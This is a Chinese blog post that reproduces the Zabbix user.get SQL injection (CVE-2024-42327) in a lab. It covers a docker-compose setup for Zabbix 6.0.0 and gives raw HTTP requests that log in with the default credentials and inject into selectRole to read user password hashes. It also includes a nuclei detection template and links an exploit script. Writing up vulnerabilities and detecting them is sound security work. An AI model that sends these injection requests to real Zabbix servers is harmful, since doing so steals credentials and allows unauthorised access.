【漏洞复现】Zabbix SQL注入漏洞 - CVE-2024-42327

已于 2024-12-06 14:40:01 修改
阅读量2.6k 收藏 10
点赞数 5
分类专栏: 漏洞复现 文章标签: zabbix CVE-2024-42327
于 2024-12-06 14:18:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/144291288
版权

该漏洞存在于 user.get API 端点,任何拥有 API 访问权限的非管理员用户(包括默认的 “用户 ”角色)都可能利用该漏洞。通过操纵特定的 API 调用,攻击者可以注入恶意 SQL 代码,从而获得未经授权的访问权限和控制权。

成功利用 CVE-2024-42327 可能会导致:

  • 数据泄露: 攻击者可以访问和外泄敏感的监控数据,包括系统配置、性能指标和用户凭据。
  • 系统泄露:攻击者可利用其升级的权限泄露底层 Zabbix 服务器,并可能转移到其他连接的系统。
  • 拒绝服务: 攻击者可通过操纵或删除关键数据来中断监控操作。

影响版本

  • 6.0.0 <= Zabbix <= 6.0.31
  • 6.4.0 <= Zabbix <= 6.4.16
  • Zabbix 7.0.0

docker 搭建 zabbix 6.0.0 环境

1. 创建容器映射文件夹

mkdir -p /zabbix-server && cd /zabbix-server && mkdir -p ./mysql/data ./mysql/conf ./mysql/logs ./font ./snmptraps ./mibs ./alertscripts ./externalscripts

2. 拉取相关镜像

docker pull mysql:8.0 && docker pull zabbix/zabbix-java-gateway:6.0.0-ubuntu && docker pull zabbix/zabbix-snmptraps:6.0.0-ubuntu && docker pull zabbix/zabbix-server-mysql:6.0.0-ubuntu && docker pull zabbix/zabbix-web-nginx-mysql:6.0.0-ubuntu

3. 上传.ttf文件解决乱码问题

cd /zabbix-server/font/
rm -rf simfang.ttf
然后随便在一个windows中复制 C:\Windows\Fonts\simfang.ttf 文件到/zabbix-server/font中即可

4. 编辑docker-compose.yml文件

version: '3'
services:
  mysql:
    image: mysql:8.0
    container_name: mysql
    volumes:
      - ./mysql/data:/var/lib/mysql
      - ./mysql/conf:/etc/mysql/conf.d
      - ./mysql/logs:/var/log/mysql
      - /etc/localtime:/etc/localtime
    restart: always
    privileged: true
    environment:
      - MYSQL_ROOT_PASSWORD=myrootpass
      - MYSQL_DATABASE=zabbix
      - MYSQL_USER=zabbix
      - MYSQL_PASSWORD=mypass
      - TZ=Asia/Shanghai
      - LANG=en_US.UTF-8
    expose:
      - "3306"
    networks:
      zabbix-net:
    command: --character-set-server=utf8 --collation-server=utf8_bin
  zabbix-gateway:
    image: zabbix/zabbix-java-gateway:6.0.0-ubuntu
    container_name: zabbix-gateway
    volumes:
      - /etc/localtime:/etc/localtime
    restart: always
    privileged: true
    ports:
      - "10052:10052"
    networks:
      zabbix-net:
  zabbix-snmptraps:
    image: zabbix/zabbix-snmptraps:6.0.0-ubuntu
    container_name: zabbix-snmptraps
    volumes:
      - /etc/localtime:/etc/localtime
      - ./snmptraps:/var/lib/zabbix/snmptraps
      - ./mibs:/var/lib/zabbix/mibs
    restart: always
    privileged: true
    ports:
      - "1162:1162/udp"
    networks:
      zabbix-net:
  zabbix-server:
    image: zabbix/zabbix-server-mysql:6.0.0-ubuntu
    container_name: zabbix-server
    volumes:
      - /etc/localtime:/etc/localtime
      - ./snmptraps:/var/lib/zabbix/snmptraps
      - ./mibs:/var/lib/zabbix/mibs
      - ./alertscripts:/usr/lib/zabbix/alertscripts
      - ./externalscripts:/usr/lib/zabbix/externalscripts
    restart: always
    privileged: true
    environment:
      - ZBX_LISTENPORT=10051
      - DB_SERVER_HOST=mysql
      - DB_SERVER_PORT=3306
      - MYSQL_DATABASE=zabbix
      - MYSQL_USER=zabbix
      - MYSQL_PASSWORD=mypass
      - MYSQL_ROOT_PASSWORD=myrootpass
      - ZBX_CACHESIZE=1G
      - ZBX_HISTORYCACHESIZE=512M
      - ZBX_HISTORYINDEXCACHESIZE=16M
      - ZBX_TRENDCACHESIZE=256M
      - ZBX_VALUECACHESIZE=256M
      - ZBX_STARTPINGERS=64
      - ZBX_IPMIPOLLERS=1
      - ZBX_ENABLE_SNMP_TRAPS=true
      - ZBX_STARTTRAPPERS=1
      - ZBX_JAVAGATEWAY_ENABLE=true
      - ZBX_JAVAGATEWAY=zabbix-gateway
      - ZBX_STARTJAVAPOLLERS=1
    ports:
      - "10051:10051"
    networks:
      zabbix-net:
    links:
      - mysql
      - zabbix-gateway
  zabbix-web:
    image: zabbix/zabbix-web-nginx-mysql:6.0.0-ubuntu
    container_name: zabbix-web
    volumes:
      - ./font/simfang.ttf:/usr/share/zabbix/assets/fonts/DejaVuSans.ttf
      - /etc/localtime:/etc/localtime
    restart: always
    privileged: true
    environment:
      - ZBX_SERVER_NAME=Zabbix 6.0.0
      - ZBX_SERVER_HOST=zabbix-server
      - ZBX_SERVER_PORT=10051
      - DB_SERVER_HOST=mysql
      - DB_SERVER_PORT=3306
      - MYSQL_DATABASE=zabbix
      - MYSQL_USER=zabbix
      - MYSQL_PASSWORD=mypass
      - MYSQL_ROOT_PASSWORD=myrootpass
      - PHP_TZ=Asia/Shanghai
    ports:
      - "80:8080"
    networks:
      zabbix-net:
    links:
      - mysql
      - zabbix-server
networks:
  zabbix-net:
    driver: bridge
    ipam:
      config:
        - subnet: 10.10.10.0/24
          gateway: 10.10.10.1

cd /zabbix-server,然后启动环境

docker-compose up -d

访问 80 端口

漏洞复现

1. 使用用户密码登陆,获取auth_token。这里使用 Admin/zabbix

POST /api_jsonrpc.php HTTP/1.1
Host: 192.168.67.135
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.24 (KHTML, like Gecko) Version/17.2 Safari/616.24
Connection: keep-alive
Content-Length: 106
Content-Type: application/json-rpc
Accept-Encoding: gzip, deflate, br

{"jsonrpc": "2.0", "method": "user.login", "params": {"username": "Admin", "password": "zabbix"}, "id": 1}

2. 使用上面获取到的token,发送数据

POST /api_jsonrpc.php HTTP/1.1
Host: 192.168.67.135
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.25
Connection: keep-alive
Content-Length: 167
Content-Type: application/json-rpc
Accept-Encoding: gzip, deflate, br

{"jsonrpc": "2.0", "method": "user.get", "params": {"selectRole": ["roleid, u.passwd", "roleid"], "userids": "1"}, "auth": "2bbce9ff7cb7dad49382b357651fa5e4", "id": 1}

漏洞 poc

nuclei 检测:


id: CVE-2024-42327-zabbix-sqli

info:
  name: zabbix-api_jsonrpc-sqli
  author: Ly4j
  severity: high
  tags: zabbix

requests:
  - raw:
      - |
        POST /api_jsonrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json-rpc

        {"jsonrpc": "2.0", "method": "user.login", "params": {"username": "Admin", "password": "zabbix"}, "id": 1}
      - |
        POST /api_jsonrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json-rpc

        {"jsonrpc": "2.0", "method": "user.get", "params": {"selectRole": ["roleid, u.passwd", "roleid"], "userids": "1"}, "auth": "{{auth}}", "id": 1}

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body_1,"jsonrpc") && contains_all(body_2,"passwd")
    extractors:
      - type: json
        internal: true
        name: auth
        json:
          - '.result'

python 利用脚本:

GitHub - aramosf/cve-2024-42327: cve-2024-42327 ZBX-25623

zabbix SQL注入漏洞复现(CVE-2024-42327)
iSee857的博客
12-04 1300
Zabbix 前端上具有默认用户角色或任何其他授予 API 访问权限的角色的非管理员用户帐户均可利用此漏洞。addRelatedObjects 函数中的 CUser 类中存在 SQLi,此函数由 CUser.get 函数调用,每个具有 API 访问权限的用户均可使用该函数。
[ vulhub漏洞复现篇 ] zabbix SQL注入漏洞CVE-2016-10134)
qq_51577576的博客
08-14 4722
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
Zabbix7.0.0 SQL注入漏洞 提权 CVE-2024-42327 CVE-2024-36467 修复教程:漏洞原理、解决方案及版本检测工具
浩策盾悟
02-21 7983
CVE-2024-42327Zabbix前端的一个严重SQL注入漏洞Zabbix 前端上具有默认 User 角色或具有任何其他授予 API 访问权限的角色的非 admin 用户帐户可以利用此漏洞SQLi 存在于 addRelatedObjects 函数的 CUser 类中此函数是从 CUser.get 函数调用的该函数可供具有 API 访问权限的每个用户使用。漏洞分析:为了执行此漏洞利用,我们首先使用用户凭证对 API 进行身份验证,该凭证会为我们提供 API 密钥作为响应。
Zabbix zbx_auditlog_global_script SQL注入漏洞缓解和修复方案
最新发布
拉丁解牛技术专栏
03-03 354
Zabbix zbx_auditlog_global_script SQL注入漏洞(CVE-2024-22120)已经在互联网上公开。在Zabbix系统中,具有Detect operating system 权限的用户可以通过时间注入获取管理员凭证,进一步利用可以结合后台功能执行代码。
Zabbix 修复开源企业网络监控工具中严重的SQLi漏洞
smellycat000的专栏
12-03 479
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Zabbix 提醒称其开源企业网络监控解决方案中存在一个严重漏洞,可导致攻击者注入任意SQL查询并攻陷数据或系统。该漏洞的编号是CVE-2024-42327(CVSS评分9.9),位于任何拥有API访问权限可访问的一个函数中。Zabbix 公司发布安全公告提到,“Zabbix 前端上拥有默认用户角色的非管理员用户账户,或者其它具有API访问权限的...
Zabbix SQL注入漏洞CVE-2024-42327修复建议
拉丁解牛技术专栏
02-05 325
Zabbix官方修复了Zabbix SQL注入漏洞(CVE-2024-42327)。利用该漏洞,具有API访问权限的用户可越权访问高权限用户敏感信息以及执行恶意SQL语句。
漏洞复现--Zabbix远程代码执行漏洞CVE-2020-11800含EXP)
HengMengSec的博客
08-21 2662
漏洞复现--Zabbix远程代码执行漏洞CVE-2020-11800含EXP)
ZABBIX 2.4.8漏洞复现
Nuyoah的博客
06-08 771
利用poc测试是否存在漏洞,放到kali下执行,首先修改poc.py里的端口,主机名。进入后台之后点击 组态–>动作–>自动注册–>创建动作。查看ZAXXIB,host 注册成功。添加主机成功,开启了自动注册功能。跳转到这个页面,选择添加主机。修改目录,直接读出flag。随便取一个名称,点击添加。
zabbix SQL注入漏洞CVE-2016-10134)
总有人间一两风,填我十万八千梦
03-05 4967
目录 一. 漏洞描述 二. 环境搭建 三. 漏洞复现 四. 漏洞修复 五. 漏洞检测脚本 一. 漏洞描述 zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle_ids[]和jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。这里就介绍jsrpc.php页中的sql注入 影响版本:zabbix 2.2.x,3...
Zabbix sql注入漏洞(CVE-2016-10134)
m0_65150886的博客
12-27 1159
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshel操作。3.登录后,查看Cookie中的zbx_sessionid,复制后16位字符。6.利用jsrpc的profileIdx2参数sql注入获取用户名和密码。5.在攻击机访问的zabbix的地址后面加上如下url。
zabbix SQL注入漏洞CVE-2016-10134)
jammny
12-04 478
漏洞详情 zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。前端页面jsrpc.php的参数profileIdx2以及后端latest.php页面中的参数toggle_ids[]存在SQL注入,攻击者可以通过此漏洞 漏洞影响 Zabbix 2.2.14之前 Zabbix 3.0~3.0.4 漏洞利用 如果可以使用guest用户进行登陆,那么可以通过账号为guest密码为空进入后台,通过抓包记住自己cookie
漏洞复现----26、Zabbix latest.php SQL注入漏洞CVE-2016-10134)
七天
06-28 811
一、Zabbix概述 Zabbix 是一个企业级分布式开源监控解决方案。Zabbix 软件能够监控众多网络参数和服务器的健康度、完整性。 Zabbix由以下组件组成: 1、Server:Zabbix server 是 Zabbix软件的核心组件,agent 向其报告可用性、系统完整性信息和统计信息。server也是存储所有配置信息、统计信息和操作信息的核心存储库。 2、数据库:所有配置信息以及 Zabbix 采集到的数据都被存储在数据库中。 3、Web 界面为了从任何地方和任何平台轻松访问 Zabbix
zabbix-latest.php-SQL注入漏洞(CVE-2016-10134)
m0_51186260的博客
06-21 1118
zabbix-latest.php-SQL注入漏洞
Zabbix漏洞
weixin_44237647的博客
11-20 1333
搜索方法:inurl:Zabbix/dashboard.php 漏洞说明: zabbix的某处存在报错注入,也可以使用sqlmap对报错点进行注入 报错点是profileIdx2= 发现用户名不是name字段,而是alias字段。与网上流传的exp的有所不同。 脚本参照前辈: 独自等待 https://www.waitalone.cn/ 更改为python3版本 import requests import os import sys import re def checkSql(): payloa
Zabbix SQL注入漏洞分析
若有战,召必回
01-07 1070
漏洞简介Zabbix 是一款开源的网络监控和报警系统,用于监视网络设备、服务器和应用程序的性能和可用性。攻击者可以通过API接口,向 user.get API端点发送恶意构造的请求,注入SQL代码,以实现权限提升、数据泄露或系统入侵。影响版本环境搭建参考https://forum.butian.net/share/3056访问https://cdn.zabbix.com/zabbix/appliances/stable/7.0/7.0.0/
警惕!Zabbix曝出严重漏洞,紧急修复指南速看
OpsEye的博客
12-04 675
漏洞编号漏洞类型:SQL注入漏洞漏洞位置:Zabbix前端的CUser类中的addRelatedObjects函数漏洞影响:未对输入数据进行充分验证和转义,导致具有API访问权限的恶意用户可以通过user.get API传递特制输入触发SQL注入攻击。
Zabbix登录绕过漏洞复现CVE-2022-23131)
渗透测试研究中心
03-03 3291
0x00 前言最近在复现zabbix漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意......
dnf install zabbix-server-mysql zabbix-web-mysql zabbix-nginx-conf zabbix-sql-scripts zabbix-selinux-policy zabbix-agent
05-29
这个命令是用来安装 Zabbix Server、Zabbix Web、Nginx 配置文件、Zabbix SQL 脚本、SELinux 策略和 Zabbix Agent。这些组件都是 Zabbix 监控系统所必需的。 如果您已经安装了 Zabbix Server 和 MySQL,您可以使用此命令安装其他必需的组件。安装命令如下: ``` dnf install zabbix-server-mysql zabbix-web-mysql zabbix-nginx-conf zabbix-sql-scripts zabbix-selinux-policy zabbix-agent ``` 安装完成后,您需要按照 Zabbix 官方文档中的说明来配置 Zabbix Server 和 Zabbix Web。其中包括创建 Zabbix 数据库、导入 SQL 脚本、编辑 Zabbix Server 配置文件等步骤。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值